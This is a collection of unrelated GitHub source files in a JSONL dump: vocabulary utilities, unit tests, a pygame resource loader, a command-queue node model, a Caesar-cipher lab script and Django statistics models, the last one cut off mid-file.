dataset_file=None):\n \"\"\"\n Gets the appropriate vocabulary file path to load.\n\n Parameters\n ----------\n pipelines : list\n List of preprocessing pipelines.\n vocab_file : str\n Path of vocabulary file.\n dataset_file : str, optional\n Path of dataset file.\n\n Returns\n -------\n vocab_to_load : str\n Path of vocabulary file to load.\n dataset_to_load : str, optional\n Path of dataset to load.\n\n \"\"\"\n pipelines.sort()\n if pipelines is None or len(pipelines) == 0:\n return None\n dataset_to_load = dataset_file[:-4] if dataset_file else ''\n vocab_to_load = vocab_file[:-4]\n for pipeline in pipelines:\n dataset_to_load += '_' + pipeline\n vocab_to_load += '_' + pipeline\n dataset_to_load += '.csv'\n vocab_to_load += '.txt'\n if dataset_file:\n return vocab_to_load, dataset_to_load\n else:\n return vocab_to_load\n\n\ndef load_vocabulary(vocab_file):\n \"\"\"\n Loads a vocabulary file into a dictionary.\n\n Parameters\n ----------\n vocab_file : str\n Path of vocabulary file.\n\n Returns\n -------\n vocab : torchtext.vocab.Vocab\n Vocabulary.\n\n \"\"\"\n vocab_dict = collections.OrderedDict()\n print(f'Loading vocabulary from {vocab_file}')\n if not os.path.isfile(vocab_file):\n print(f'Vocabulary file not found')\n open(vocab_file, 'a+').close()\n with open(vocab_file, 'r', encoding='utf-8') as reader:\n tokens = reader.readlines()\n for index, token in tqdm(enumerate(tokens), total=len(tokens)):\n token = token.rstrip('\\n')\n vocab_dict[token] = index + 1\n vocab = torchtext.vocab.vocab(vocab_dict, min_freq=1).get_stoi()\n print(f'Loaded vocabulary')\n return vocab\n\n\ndef save_vocabulary(save_path, vocab):\n \"\"\"\n Save the vocabulary to a given file path.\n\n Parameters\n ----------\n save_path : str\n Saving path of the vocabulary.\n vocab : torchtext.vocab.Vocab\n Vocabulary.\n\n \"\"\"\n index = 0\n print(f'Saving vocabulary to path: {save_path}')\n with open(save_path, 'w', encoding='utf-8') as writer:\n for token, token_index in sorted(vocab.items(), key=lambda kv: kv[1]):\n if index != token_index:\n print(\n f'Saving vocabulary to {save_path}: vocabulary indices are not consecutive.'\n ' Please check that the vocabulary is not corrupted!')\n index = token_index\n writer.write(token + '\\n')\n index += 1\n","repo_name":"ilSommo/rate-severity-of-toxic-comments","sub_path":"rate_severity_of_toxic_comments/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41384126588","text":"# -*- coding: utf-8 -*-\n\nimport sxtools\n\n\nTO_DO = {\n 'carro': 'carros',\n 'moto': 'motos',\n 'caminhao': 'caminhoes',\n 'caminhão': 'caminhões',\n 'nautico': 'nauticos',\n 'CAMINHÃO': 'CAMINHÕES',\n 'Legal': 'Legais',\n 'LEGAL': 'LEGAIS'\n}\n\n\ndef test_pluralize_items():\n for to in TO_DO:\n assert sxtools.pluralize(to) == TO_DO[to]\n","repo_name":"sxslex/sxtools","sub_path":"tests/test_pluralize.py","file_name":"test_pluralize.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"pt","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"2725221988","text":"import pygame\nimport os\n\nWIDTH = 1920\nHEIGHT = 1080\nSIZESETKAX = 108\nSIZESETKAY = 192\nMUSIC_VOLUME = 0\nCONVEER_SIZE = 32\n\npygame.init()\npygame.mixer.init()\npygame.display.set_caption(\"mini Factory\")\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\nmain_folder = os.path.dirname(__file__)\n\nfon_image = pygame.image.load(os.path.join(main_folder, \"images/Fon.jpg\")).convert_alpha()\nbtn_settings_img = pygame.image.load(os.path.join(main_folder, \"images/Settings.png\")).convert_alpha()\nbtn_start_img = pygame.image.load(os.path.join(main_folder, \"images/Start.png\")).convert_alpha()\nbtn_sound_off_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/soundOFF.png\")).convert_alpha()\nbtn_sound_minus_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/sound_minus.png\")).convert_alpha()\nbtn_sound_plus_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/sound_plus.png\")).convert_alpha()\nbtn_back_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/back.png\")).convert_alpha()\nbtn_yes_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/yes.png\")).convert_alpha()\nbtn_no_img = pygame.image.load(os.path.join(main_folder, \"images/buttons/no.png\")).convert_alpha()\nbtn_quit_img = pygame.image.load(os.path.join(main_folder, \"images/quit.png\")).convert_alpha()\nnumber_0_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/0.png\")).convert_alpha()\nnumber_10_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/10.png\")).convert_alpha()\nnumber_20_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/20.png\")).convert_alpha()\nnumber_30_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/30.png\")).convert_alpha()\nnumber_40_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/40.png\")).convert_alpha()\nnumber_50_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/50.png\")).convert_alpha()\nnumber_60_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/60.png\")).convert_alpha()\nnumber_70_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/70.png\")).convert_alpha()\nnumber_80_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/80.png\")).convert_alpha()\nnumber_90_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/90.png\")).convert_alpha()\nnumber_100_img = pygame.image.load(os.path.join(main_folder, \"images/numbers/100.png\")).convert_alpha()\nfon_game_img = pygame.image.load(os.path.join(main_folder, \"images/fon_game.jpeg\")).convert_alpha()\nhud_up_img = pygame.image.load(os.path.join(main_folder, \"images/hud/hud_up1.png\")).convert_alpha()\nhud_down_img = pygame.image.load(os.path.join(main_folder, \"images/hud/hud_down1.png\")).convert_alpha()\nzhila_med_img = pygame.image.load(os.path.join(main_folder, \"images/med.png\")).convert_alpha()\nzhila_iron_img = pygame.image.load(os.path.join(main_folder, \"images/iron.png\")).convert_alpha()\nzhila_isvestnyak_img = pygame.image.load(os.path.join(main_folder, \"images/isvestnyak.png\")).convert_alpha()\nikonka_beton_img = pygame.image.load(os.path.join(main_folder, \"images/resources/beton.png\")).convert_alpha()\nikonka_iron_img = pygame.image.load(os.path.join(main_folder, \"images/resources/iron.png\")).convert_alpha()\nikonka_isvestnyak_img = pygame.image.load(os.path.join(main_folder, \"images/resources/isvestnyak.png\")).convert_alpha()\nikonka_kabel_img = pygame.image.load(os.path.join(main_folder, \"images/resources/kabel.png\")).convert_alpha()\nikonka_karkas_img = pygame.image.load(os.path.join(main_folder, \"images/resources/karkas.png\")).convert_alpha()\nikonka_motor_img = pygame.image.load(os.path.join(main_folder, \"images/resources/motor.png\")).convert_alpha()\nikonka_plastina_img = pygame.image.load(os.path.join(main_folder, \"images/resources/plastina.png\")).convert_alpha()\nikonka_provolka_img = pygame.image.load(os.path.join(main_folder, \"images/resources/provolka.png\")).convert_alpha()\nikonka_prut_img = pygame.image.load(os.path.join(main_folder, \"images/resources/prut.png\")).convert_alpha()\nikonka_rotor_img = pygame.image.load(os.path.join(main_folder, \"images/resources/rotor.png\")).convert_alpha()\nikonka_startor_img = pygame.image.load(os.path.join(main_folder, \"images/resources/startor.png\")).convert_alpha()\nikonka_ukr_plastina_img = pygame.image.load(os.path.join(main_folder, \"images/resources/ukr_plastina.png\")).convert_alpha()\nikonka_vint_img = pygame.image.load(os.path.join(main_folder, \"images/resources/vint.png\")).convert_alpha()\nikonka_ymnaya_obshivka_img = pygame.image.load(os.path.join(main_folder, \"images/resources/ymnaya_obshivka.png\")).convert_alpha()\nikonka_med_img = pygame.image.load(os.path.join(main_folder, \"images/resources/med.png\")).convert_alpha()\nhud_next_img = pygame.image.load(os.path.join(main_folder, \"images/hud/next.png\")).convert_alpha()\nhud_previos_img = pygame.image.load(os.path.join(main_folder, \"images/hud/previos.png\")).convert_alpha()\nnumber_0__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/0_.png\")).convert_alpha()\nnumber_1__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/1.png\")).convert_alpha()\nikonka_asembler_image = pygame.image.load(os.path.join(main_folder, \"images/asembler_1.png\")).convert_alpha()\nikonka_bur_image = pygame.image.load(os.path.join(main_folder, \"images/bur_1.png\")).convert_alpha()\nikonka_constructor_image = pygame.image.load(os.path.join(main_folder, \"images/constructor_1.png\")).convert_alpha()\nikonka_soedenitel_image = pygame.image.load(os.path.join(main_folder, \"images/soedenitel.png\")).convert_alpha()\nikonka_razvetlitel_image = pygame.image.load(os.path.join(main_folder, \"images/razvetlitel.png\")).convert_alpha()\nnumber__1__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/1_.png\")).convert_alpha()\nnumber__2__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/2_.png\")).convert_alpha()\nnumber__3__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/3_.png\")).convert_alpha()\nnumber__4__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/4_.png\")).convert_alpha()\nnumber__5__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/5_.png\")).convert_alpha()\nnumber__6__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/6_.png\")).convert_alpha()\nnumber__7__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/7_.png\")).convert_alpha()\nnumber__8__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/8_.png\")).convert_alpha()\nnumber__9__img = pygame.image.load(os.path.join(main_folder, \"images/numbers/9_.png\")).convert_alpha()\nhud_postroika_right_img = pygame.image.load(os.path.join(main_folder, \"images/hud/right_postroika_hud.png\")).convert_alpha()\nhud_postroika_left_img = pygame.image.load(os.path.join(main_folder, \"images/hud/left_postroika_hud.png\")).convert_alpha()\n\nikonka_text_rescurces_beton_image = pygame.image.load(os.path.join(main_folder, \"images/names/beton.png\")).convert_alpha()\nikonka_text_rescurces_iron_image = pygame.image.load(os.path.join(main_folder, \"images/names/iron.png\")).convert_alpha()\nikonka_text_rescurces_isvestnyak_image = pygame.image.load(os.path.join(main_folder, \"images/names/isvestnyak.png\")).convert_alpha()\nikonka_text_rescurces_kabel_image = pygame.image.load(os.path.join(main_folder, \"images/names/kabel.png\")).convert_alpha()\nikonka_text_rescurces_karkas_image = pygame.image.load(os.path.join(main_folder, \"images/names/karkas.png\")).convert_alpha()\nikonka_text_rescurces_med_image = pygame.image.load(os.path.join(main_folder, \"images/names/med.png\")).convert_alpha()\nikonka_text_rescurces_motor_image = pygame.image.load(os.path.join(main_folder, \"images/names/motor.png\")).convert_alpha()\nikonka_text_rescurces_plastina_image = pygame.image.load(os.path.join(main_folder, \"images/names/plastina.png\")).convert_alpha()\nikonka_text_rescurces_provolka_image = pygame.image.load(os.path.join(main_folder, \"images/names/provolka.png\")).convert_alpha()\nikonka_text_rescurces_prut_image = pygame.image.load(os.path.join(main_folder, \"images/names/prut.png\")).convert_alpha()\nikonka_text_rescurces_rotor_image = pygame.image.load(os.path.join(main_folder, \"images/names/rotor.png\")).convert_alpha()\nikonka_text_rescurces_startor_image = pygame.image.load(os.path.join(main_folder, \"images/names/startor.png\")).convert_alpha()\nikonka_text_rescurces_ukr_plastina_image = pygame.image.load(os.path.join(main_folder, \"images/names/ukr_plastina.png\")).convert_alpha()\nikonka_text_rescurces_vint_image = pygame.image.load(os.path.join(main_folder, \"images/names/vint.png\")).convert_alpha()\nikonka_text_rescurces_ymnaya_obshivka_image = pygame.image.load(\n os.path.join(main_folder, \"images/names/ymnaya_obshivka.png\")).convert_alpha()\nikonka_text_postroyka_asembler_image = pygame.image.load(os.path.join(main_folder, \"images/names/asembler.png\")).convert_alpha()\nikonka_text_postroyka_bur_image = pygame.image.load(os.path.join(main_folder, \"images/names/bur.png\")).convert_alpha()\nikonka_text_postroyka_konstruktor_image = pygame.image.load(os.path.join(main_folder, \"images/names/konstruktor.png\")).convert_alpha()\nikonka_text_postroyka_yashik_image = pygame.image.load(os.path.join(main_folder, \"images/names/yashik.png\")).convert_alpha()\nimg_no_stroit = pygame.image.load(os.path.join(main_folder, \"images/ne_stroit.png\")).convert_alpha()\nimg_close = pygame.image.load(os.path.join(main_folder, \"images/hud/close.png\")).convert_alpha()\nimg_left = pygame.image.load(os.path.join(main_folder, \"images/hud/left.png\")).convert_alpha()\nimg_top = pygame.image.load(os.path.join(main_folder, \"images/hud/top.png\")).convert_alpha()\nimg_right = pygame.image.load(os.path.join(main_folder, \"images/hud/right.png\")).convert_alpha()\nimg_conveer_straight = pygame.image.load(os.path.join(main_folder, \"images/new_conveer_1.png\")).convert_alpha()\nimg_conveer_corner = pygame.image.load(os.path.join(main_folder, \"images/conveer_2.png\")).convert_alpha()\n\nimg_blue_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/blue_window.png\")).convert_alpha()\nimg_green_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/green_window.png\")).convert_alpha()\nimg_purple_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/purple_window.png\")).convert_alpha()\nimg_red_window = pygame.image.load(os.path.join(main_folder, \"images/for_setka/red_window.png\")).convert_alpha()\nvedelenie_img = pygame.image.load(os.path.join(main_folder, \"images/hud/vedelen.png\")).convert_alpha()\ndell_img = pygame.image.load(os.path.join(main_folder, \"images/hud/dell.png\"))\nconveer_1_template_img = pygame.image.load(os.path.join(main_folder, \"images/new_conveer_1_template.png\"))\nconveer_2_template_img = pygame.image.load(os.path.join(main_folder, \"images/conveer_2_template.png\"))\n\n# зелёный пустота\n# фиолетовый жилы\n# синий бур\n# красный все остальные постройки\nspisok_windows_image = [img_green_window, img_purple_window, img_blue_window, img_red_window]\n\nspisok_zhil_image = [zhila_iron_img, zhila_isvestnyak_img, zhila_med_img]\n\nspisok_postroiki_image = [ikonka_asembler_image, ikonka_bur_image, ikonka_constructor_image, ikonka_razvetlitel_image,\n ikonka_soedenitel_image]\n\nspisok_strelki_img = [img_left, img_top, img_right]\n\n\"\"\"\n0 0 1 0 - выход справо\n1 0 0 0 - выход слева\n0 1 0 0 - выход cнизу\n0 0 0 1 - выход сверху\n\"\"\"\nspisok_postroiki_outputs_diraction = [[0, 0, 1, 0], [1, 0, 0, 0], [1, 0, 0, 0], [1, 0, 1, 1], [0, 0, 0, 1]]\n\n\"\"\"\nassembler - два слева\nminer - отсутствуют входные порты\nconstructor - один справа\nsplitter - один снизу\nconnector - подному слева, снизу, справа\nпротив часовой стрелки\n\"\"\"\nspisok_postroiki_input_ports = [\n [[(-80,-25), (-80,17)], [(25,80), (-17,80)], [(80,-17), (80,25)], [(-25,-80), (17,-80)]],\n None,\n [[(32, 0)], [(0, -32)], [(-32, 0)], [(32, 0)]],\n [[(0, 32)], [(32, 0)], [(0, -32)], [(-32, 0)]],\n [[(0,0), (0,0), (0,0)], [(0,0), (0,0), (0,0)], [(0,0), (0,0), (0,0)], [(0,0), (0,0), (0,0)]]\n ]\n\n\n\nspisok_rescurces_img = [ikonka_beton_img, ikonka_iron_img, ikonka_isvestnyak_img, ikonka_kabel_img,\n ikonka_karkas_img,\n ikonka_med_img, ikonka_motor_img, ikonka_plastina_img, ikonka_provolka_img,\n ikonka_prut_img,\n ikonka_rotor_img, ikonka_startor_img, ikonka_ukr_plastina_img, ikonka_vint_img,\n ikonka_ymnaya_obshivka_img]\n\nnames_rescurces = [ikonka_text_rescurces_beton_image, ikonka_text_rescurces_iron_image,\n ikonka_text_rescurces_isvestnyak_image, ikonka_text_rescurces_kabel_image,\n ikonka_text_rescurces_karkas_image,\n ikonka_text_rescurces_med_image, ikonka_text_rescurces_motor_image,\n ikonka_text_rescurces_plastina_image, ikonka_text_rescurces_provolka_image,\n ikonka_text_rescurces_prut_image,\n ikonka_text_rescurces_rotor_image, ikonka_text_rescurces_startor_image,\n ikonka_text_rescurces_ukr_plastina_image, ikonka_text_rescurces_vint_image,\n ikonka_text_rescurces_ymnaya_obshivka_image, ikonka_text_postroyka_asembler_image,\n ikonka_text_postroyka_bur_image, ikonka_text_postroyka_konstruktor_image,\n ikonka_text_postroyka_yashik_image,\n ikonka_text_postroyka_yashik_image]\n\nnumbers_image_for_sound = [number_0_img, number_10_img, number_20_img, number_30_img, number_40_img, number_50_img,\n number_60_img, number_70_img, number_80_img, number_90_img, number_100_img]\n\nnumbers_image = [number_0__img, number__1__img, number__2__img, number__3__img, number__4__img, number__5__img,\n number__6__img, number__7__img, number__8__img, number__9__img]\n\nfon_music = os.path.join(main_folder, 'sounds\\\\oil_rig_ambience_01.mp3')\n","repo_name":"borik2008/minifactory","sub_path":"resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":14321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38597859646","text":"\"\"\"\nTest the `transactional_guard` decorator in terms of creating the transaction\nbefore checking the policies and calling rollback if policy is broken.\n\"\"\"\nfrom resource.resource_test_helper import UserModel, create_resource_test_data, users\nfrom unittest import TestCase\nimport unittest.mock as mock\n\nfrom mocks import mock_db_session\n\nfrom zsl import Zsl\nfrom zsl.application.containers.web_container import WebContainer\nfrom zsl.application.modules.alchemy_module import TransactionHolder\nfrom zsl.resource.guard import Access, GuardedMixin, ResourcePolicy, transactional_guard\nfrom zsl.resource.model_resource import ModelResource\nfrom zsl.testing.db import IN_MEMORY_DB_SETTINGS, DbTestCase\n\n\nclass UserResource(ModelResource):\n __model__ = UserModel\n\n\nclass TransactionalGuardTest(TestCase):\n def setUp(self):\n zsl = Zsl(__name__, config_object=IN_MEMORY_DB_SETTINGS,\n modules=WebContainer.modules())\n zsl.testing = True\n\n create_resource_test_data()\n super().setUp()\n\n def testIsInTransaction(self):\n test_case = self\n\n class AllowPolicy(ResourcePolicy):\n default = Access.ALLOW\n\n @transactional_guard([AllowPolicy()])\n class GuardedUserModel(UserResource, GuardedMixin):\n def secure_read(self, *args, **kwargs):\n test_case.assertIsNotNone(self._orm)\n test_case.assertTrue(self._in_transaction)\n\n return super().read(*args, **kwargs)\n\n resource = GuardedUserModel()\n user = resource.read('1', {}, {})\n\n self.assertDictEqual(users[0]._asdict(), user.get_attributes(),\n \"should return first user\")\n\n @staticmethod\n def testRollbackBefore():\n class DenyPolicy(ResourcePolicy):\n default = Access.DENY\n\n @transactional_guard([DenyPolicy()])\n class GuardedUserModel(UserResource, GuardedMixin):\n pass\n\n class TestTHolder(TransactionHolder):\n rollback = mock.MagicMock()\n _orm = mock.MagicMock()\n\n with mock.patch(\n 'zsl.application.modules.alchemy_module.TransactionHolder',\n side_effect=TestTHolder\n ):\n resource = GuardedUserModel()\n resource.read('', {}, {})\n\n TestTHolder.rollback.assert_called_with()\n TestTHolder._orm.assert_not_called()\n\n @staticmethod\n def testRollbackAfter():\n class DenyAfterPolicy(ResourcePolicy):\n default = Access.ALLOW\n\n def can_read__after(self, *args, **kwargs):\n return Access.DENY\n\n mock_sess = mock_db_session()\n\n @transactional_guard([DenyAfterPolicy()])\n class GuardedUserModel(UserResource, GuardedMixin):\n pass\n\n class MyTestCase(DbTestCase, TestCase):\n def runTest(self):\n pass\n\n def testIt(self):\n resource = GuardedUserModel()\n resource.read('', {}, {})\n\n if hasattr(mock_sess.query, 'assert_called'):\n mock_sess.query.assert_called()\n mock_sess.rollback.assert_called_with()\n\n test_case = MyTestCase()\n test_case.setUp()\n test_case.testIt()\n test_case.tearDown()\n","repo_name":"AtteqCom/zsl","sub_path":"tests/resource/transactional_guard_test.py","file_name":"transactional_guard_test.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7165933258","text":"from siptracklib.objectregistry import object_registry\nfrom siptracklib import treenodes\nfrom siptracklib import attribute\nfrom siptracklib import permission\n\ndef get_queue(object_store, queue_name):\n ret = None\n for queue in object_store.view_tree.listChildren(include = ['command queue']):\n if queue.attributes.get('name') == queue_name:\n ret = queue\n break\n return ret\n\nclass CommandQueue(treenodes.BaseNode):\n class_id = 'CQ'\n class_name = 'command queue'\n class_data_len = 0\n\n def _commandSorter(self, x, y):\n return cmp(x.ctime, y.ctime)\n\n def listCommands(self):\n commands = list(self.listChildren(include = ['command']))\n commands.sort(cmp=self._commandSorter)\n return commands\n\n def processCommands(self, only_unique = False, dedup_sequential = False, remove = False):\n sent = {}\n prev_command = None\n for command in self.listCommands():\n skip = False\n if only_unique:\n if command.freetext in sent:\n skip = True\n sent[command.freetext] = True\n if dedup_sequential:\n if prev_command == command.freetext:\n skip = True\n prev_command = command.freetext\n if not skip:\n yield command\n if remove:\n command.remove()\n\nclass Command(treenodes.BaseNode):\n class_id = 'C'\n class_name = 'command'\n class_data_len = 1\n\n def __init__(self, parent, freetext = None):\n super(Command, self).__init__(parent)\n self._freetext = freetext\n\n def _created(self):\n self.oid = self.transport.add(self.parent.oid, self._freetext)\n\n def _loaded(self, node_data):\n super(Command, self)._loaded(node_data)\n self._freetext = node_data['data'][0]\n\n def _get_freetext(self):\n return self._freetext\n\n def _set_freetext(self, val):\n self._freetext = val\n self.transport.setFreetext(self.oid, val)\n freetext = property(_get_freetext, _set_freetext)\n\n def setStatus(self, status):\n self.attributes['status'] = status\n\nclass EventTrigger(treenodes.BaseNode):\n class_id = 'ET'\n class_name = 'event trigger'\n class_data_len = 0\n\nclass EventTriggerRulePython(treenodes.BaseNode):\n class_id = 'ETRP'\n class_name = 'event trigger rule python'\n class_data_len = 3\n\n def __init__(self, parent, code = None):\n super(EventTriggerRulePython, self).__init__(parent)\n self._code = code\n self._error = ''\n self._error_timestamp = 0\n\n def _created(self):\n self.oid = self.transport.add(self.parent.oid, self._code)\n\n def _loaded(self, node_data):\n super(EventTriggerRulePython, self)._loaded(node_data)\n self._code = node_data['data'][0]\n self._error = node_data['data'][1]\n self._error_timestamp = node_data['data'][2]\n\n def _get_code(self):\n return self._code\n def _set_code(self, val):\n self._code = val\n self.transport.setCode(self.oid, val)\n code = property(_get_code, _set_code)\n\n @property\n def error(self):\n return self._error\n\n @property\n def error_timestamp(self):\n return self._error_timestamp\n\n# Add the objects in this module to the object registry.\no = object_registry.registerClass(Command)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\n\no = object_registry.registerClass(CommandQueue)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\no.registerChild(Command)\n\no = object_registry.registerClass(EventTriggerRulePython)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\n\no = object_registry.registerClass(EventTrigger)\no.registerChild(attribute.Attribute)\no.registerChild(attribute.VersionedAttribute)\no.registerChild(permission.Permission)\no.registerChild(EventTriggerRulePython)\n","repo_name":"sii/siptrack","sub_path":"siptracklib/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"19281190133","text":"def rollLengthFunc(twoChars): #Tar en sträng \"AB\" och returnerar längden som alla bokstäver ska \"rullas\"\n\tlength = ord(twoChars[1]) - ord(twoChars[0])\n\tif(not length == abs(length)): #Blir start - stop negativt?\n\t\tlength = 26 - abs(length)\n\treturn length\n\ndef convertLine(line,rollLength): #Line = rad från filen. rollLength = hur långt ska varje bokstav rullas?\n\tretLine=\"\"\n\tfor char in line:\n\t\tif char == \" \" or not char.istitle(): #Är bokstaven liten eller ett mellanslag?\n\t\t\tappendChar = char\n\t\telse:\n\t\t\tif ( ord(char) + rollLength) > 90: #Kommer rullningen att \"börja om från A\"?\n\t\t\t\tappendChar = chr( ord(char) -26 + rollLength)\n\t\t\telse:\n\t\t\t\tappendChar = chr(ord(char) + rollLength)\n\n\t\tretLine += appendChar #Lägg till bokstaven i slutet på den ursprungligen tomma strängen.\n\n\treturn retLine + \"\\n\" #Returnerar den krypterade sträng\n\n\n\n\ndef crypto():\n\tfromFileString = input(\"What file would you like to read from?\")\n\tencryptionString = input(\"What does ur encryption look like?\")\n\n\trollLength = rollLengthFunc(encryptionString) #Hur långt ska bokstäverna rullas?\n\t\n\ttry:\n\t\tfromFile = open(fromFileString,\"r\") \n\t\ttoFile = open(\"encryptedWith\" +encryptionString +\".txt\" , 'w')#Skapar en ny fil som berättar vilken krypteringsnyckel som använts.\n\n\t\tfor line in fromFile:\n\t\t\tline.rstrip('\\n')\n\t\t\ttoFile.write( convertLine(line, rollLength)) #Skriv det som convertLine returnear.\n\n\n\t\tfromFile.close()\n\t\ttoFile.close()\n\n\texcept IOError:\n\t\tprint(\"You entered an invalid filename, closing down \\n\")\n\t\tpass\n\n\nif __name__ ==\"__main__\": #Gör det möjligt att köra doctest utan att kommentera ut något.\n\tcrypto()\n\n","repo_name":"MaxKrog/KTH","sub_path":"PRGOMED/lab4/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28431531889","text":"import json\n\n\ndef merge_personal():\n with open('meta_data/ccw_rate.json', 'r') as rate, open('meta_data/ccw_count.json', 'r') as count, open('ccw.json', 'w') as output:\n\n correct_rate_data = json.load(rate)\n correct_count_data = json.load(count)\n\n for name in correct_count_data:\n correct_rate_data[name]['excellentLegislatorNum'] = correct_count_data[name]['excellentLegislatorNum']\n correct_rate_data[name]['observedLegislatorNum'] = correct_count_data[name]['observedLegislatorNum']\n\n merge_data = json.dumps(correct_rate_data, ensure_ascii=False, indent=4)\n output.write(merge_data)\n","repo_name":"g0v/2020voting-guide","sub_path":"crawler/citizen_congress_watch/merge_excel_web/merge_personal.py","file_name":"merge_personal.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"72"} +{"seq_id":"42071402941","text":"from django.db import models\nfrom django.template.defaultfilters import slugify\nimport datetime\n\n\n# All Models will fall under a specific year/ statistic period\nclass StatsPeriod(models.Model):\n\tyear = models.IntegerField(unique=True)\n\tslug = models.SlugField(unique=True)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Stats period\"\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.year)\n\t\tsuper(StatsPeriod, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn str(self.year)\n\n# The Gender model defined here\nclass GenderCategory(models.Model):\n\tstatsperiod = models.ForeignKey(StatsPeriod, on_delete=models.CASCADE)\n\tgender = models.CharField(max_length=6, unique=True)\n\tslug = models.SlugField(unique=True)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Gender categories\"\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.gender)\n\t\tsuper(GenderCategory, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.gender\n\n# Social Platform model defined here\nclass SocialPlatform(models.Model):\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tplatform = models.CharField(max_length=12)\n\tslug = models.SlugField()\n\n\tclass Meta:\n\t\tunique_together = ('gendercategory', 'platform')\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.platform)\n\t\tsuper(SocialPlatform, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.platform\n\n# Model for Social Media Usage \nclass PlatformUse(models.Model):\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tsocialplatform = models.ForeignKey(SocialPlatform, on_delete=models.CASCADE)\n\tfrequency = models.CharField(max_length=40)\n\tusagepercent = models.IntegerField(default=0)\n\tslug = models.SlugField()\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Platform Use\"\n\t\tunique_together = ('gendercategory','socialplatform','frequency')\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.frequency)\n\t\tsuper(PlatformUse, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.frequency\n\n# Model for classing of comments (Pos or Neg)\nclass CommentStats(models.Model):\n\tsocialplatform = models.ForeignKey(SocialPlatform,on_delete=models.CASCADE)\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tcommentcategory = models.CharField(max_length=12)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Comment stats\"\n\t\tunique_together = ('gendercategory','socialplatform','commentcategory')\n\n\tdef __str__(self):\n\t\treturn self.commentcategory\n\n# Political party model\nclass Party(models.Model):\n\tname = models.CharField(max_length=128, unique=True)\n\tslug = models.SlugField(unique=True)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Parties\"\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.name)\n\t\tsuper(Party, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.name\n\n# Age bracket model\nclass AgeBracket(models.Model):\n\tagegroup = models.CharField(max_length=128, unique=True)\n\tslug = models.SlugField(unique=True)\n\n\tdef save(self, *args, **kwargs):\n\t\tself.slug = slugify(self.agegroup)\n\t\tsuper(AgeBracket, self).save(*args, **kwargs)\n\n\tdef __str__(self):\n\t\treturn self.agegroup\n\n\n# Ovawp Models begin here\nclass GenderOvawp(models.Model):\n\tgendercategory = models.ForeignKey(GenderCategory, on_delete=models.CASCADE)\n\tovawp = models.CharField(max_length=128)\n\tpercentage = models.IntegerField(default=0)\n\n\tclass Meta:\n\t\tverbose_name_plural = \"Gender ovawp\"\n\t\tunique_together = ('gendercategory', 'ovawp')\n\n\tdef 